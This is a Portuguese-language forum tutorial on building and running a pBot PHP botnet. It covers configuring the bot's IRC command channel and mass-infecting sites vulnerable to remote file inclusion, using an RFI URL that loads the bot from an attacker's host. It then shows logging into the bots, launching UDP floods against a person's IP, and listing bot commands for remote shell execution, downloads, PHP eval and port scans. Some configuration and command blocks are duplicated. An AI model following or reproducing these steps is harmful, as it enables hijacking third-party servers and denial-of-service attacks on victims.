Primeiramente baixem os programas
Cliente mIRC [Download] - Cliente "oficial" do mIRC. Você também pode baixar scripts como CyberScript, ou até mesmo usar o ChatZilla que é uma extenção para Firefox, vai de sua preferência.
xRoot + Triad List Sites Editor [Download] - Usamos o xRoot e o Triad List Sites Editor para rodar todos os bots de uma vez. Imaginem se tivessemos que visitar site por site, testando máquina por máquina, ia demorar muito pra carregar os bots.
Senha para descompactar: www.forum-invaders.com.br
pBot [Download] - Essa é uma botnet em PHP muito boa. A vantagem de usar botnet em PHP, é que roda tanto em Linux quando Windows, já que podemos rodar direto pelo link como se fôssemos usar o pBot como uma phpshell. É só upar o seu pBot configurado em algum host de sua preferência, e rodar no RFI: http://www.host.com.br/vuln.php?fvox=http://seuhost.com.br/pBot.txt.
Vocês podem usar também botnets em perl, mas só vai rodar em Linux e é difícil rodar em todas as máquinas de uma vez só.
Configurando
A configuração do pBot é muito simples. A configuração começa na linha número 8. Localize essa parte no script, e vamos então configurar:
Código:
var $config = array("server"=>"irc.chatbr.org",
"port"=>6667,
"pass"=>"fx",
"prefix"=>"fvox",
"maxrand"=>8,
"chan"=>"#forum-invaders",
"key"=>"",
"modes"=>"+iB-x",
"password"=>"b0t",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname
);
"port"=>6667,
"pass"=>"fx",
"prefix"=>"fvox",
"maxrand"=>8,
"chan"=>"#forum-invaders",
"key"=>"",
"modes"=>"+iB-x",
"password"=>"b0t",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname
);
server: Nessa parte da configuração você deve colocar a rede em que os bots vão conectar. Ali eu coloquei irc.chatbr.org, que é uma rede muito boa onde fica o canal do fórum invaders.
port: Porta da rede. A porta padrão é 6667.
pass: Você deve colocar a senha para logar no bot. Sem a senha, você não executa comandos. No caso, a senha que eu escolhi foi fx.
prefix: O nome dos bots são gerados randomicamente. Entretanto, o prefix fica no meio do nome do bot. Exemplo de nome: [A]fvox01080371.
chan: Insira o nome do canal onde os bots vão conectar, e por onde você vai comandar os bots.
password: Caso o canal esteja em modo "+k", ou seja, canal com chave (key), coloque a senha do canal.
O resto das configurações vocês podem deixar assim mesmo.
Arrumando a lista de sites vulneráveis
Para rodar os bots, vocês vão ter que ter uma lista de sites vulneráveis a PHP Injection.
Abra o programa (-TRIAD-) List Sites Editor.exe, clique no botão abrir e selecione a lista de sites vulneráveis.
Na parte "Remover da URL:", coloque um "=" (sem aspas) no campo de texto do "Tudo que estiver a FRENTE de:" e então cliquem no Go.
Agora todos os sites estão só até o "=".
Copie todos os sites usando o Control+C ao invés do botão Salvar. O botão Salvar, grava todos os sites em um arquivo *.rtf ao invés de *.txt.
Agora cole usando Control+V no Blobo de notas e salve o arquivo.
Rodando os bots
Agora chegou a hora de usar o xRoot. Abrindo o xRoot, vamos até a aba Scan.
Vamos clicar no botão Abrir lista e selecionar a lista que filtramos com o Triad List Sites. Aqui eu furtei algumas máquinas do R0ck. *-*
Já com o pBot configurado e upado em algum host, colocamos o link do pBot no campo de texto referente a "CMD pra por:" (não se esqueçam de deixar o "?" depois do .txt. Em "Achar:" pode deixar em branco, afinal é só pro xRoot visitar site por site da lista mesmo.
Agora devemos clicar no botão "Por CMD" e aguardar o xRoot inserir a cmd nas urls.
Depois de colocar a CMD após o "=" com o xRoot, é só clicar no botão "Testar sites...".
Agora como o xRoot visita site por site procurando por vulneráveis, logo os bots vão rodar automaticamente, facilitando muito as coisas!
Logando nos bots
Sem você fazer o login nos bots, eles não te respondem aos comandos.
Para fazer o login, você deve usar o comando .user
A senha é aquela que você definiu na parte de configuração do pBot.
Para logar, vou usar o comando .user b0t, onde "b0t" foi a senha que eu escolhi para fazer esse tutorial.
Atacando
O pBot pode fazer UDP Flood e TCP Flood.
Eu já vi algumas botnets em perl que fazem até syn flood, mas eu curto o pBot
Para pacotar: .udpflood
Eu vou usar 65000 packets, 65000 de packetsize e o delay eu usarei 30.
Então usarei: .udpflood
Como o Muniz é uma alma bem caridosa, ele me forneceu seu IP para ser pacotado, que lindo né?
Comandos pBot
Aqui vai uma lista com outros comandos que vocês podem usar do pBot:
Citação:
= COMMANDS ============================================================================
.user //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail //send an email
.dns //dns lookup
.download //download a file
.exec // uses shell_exec() //execute a command
.cmd // uses popen() //execute a command
.info //get system information
.php // uses eval() //execute php code
.tcpflood //tcpflood attack
.udpflood //udpflood attack
.raw //raw IRC command
.rndnick //change nickname
.pscan //port scan
.ud.server [newpass] //change IRC server
---------------------------------------------------------------------------------------
.user
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.dns
.download
.exec
.cmd
.info //get system information
.php
.tcpflood
.udpflood
.raw
.rndnick //change nickname
.pscan
.ud.server
---------------------------------------------------------------------------------------
Pronto qualquer duvida deixe o comentario
1 comentários:
Eu tenho que comprar uma conta mo mIRC?
Postar um comentário